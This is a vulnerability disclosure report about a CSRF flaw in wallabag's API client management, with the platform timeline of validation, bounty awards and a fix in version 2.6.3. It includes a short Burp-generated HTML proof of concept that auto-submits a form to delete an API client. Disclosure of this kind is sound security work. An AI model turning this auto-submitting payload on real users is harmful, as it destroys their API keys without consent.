CSRF leading to delete Client API in API clients management in wallabag/wallabag

Valid

Reported on

Mar 31st 2023

Description

wallabag was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily delete API key via

client/delete/{id}

Proof of Concept

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://192.168.125.133/developer/client/delete/2">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

This vulnerability is capable of tricking a user to delete their own API key

We are processing your report and will contact the wallabag team within 24 hours. 8 months ago
TuanTH modified the report
8 months ago
We have contacted a member of the wallabag team and are waiting to hear back 8 months ago
Nicolas Lœuillet validated this vulnerability 5 months ago
TuanTH has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
TuanTH
5 months ago

Researcher

thanks @nicosomb, i hope this vulnerability can be assigned a CVE

Nicolas Lœuillet marked this as fixed in 2.6.3 with commit ffcc5c 3 months ago
Nicolas Lœuillet has been awarded the fix bounty
This vulnerability has been assigned a CVE
Nicolas Lœuillet published this vulnerability 3 months ago
Nicolas Lœuillet gave praise 3 months ago
Thank you @tht1997 !
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
to join this conversation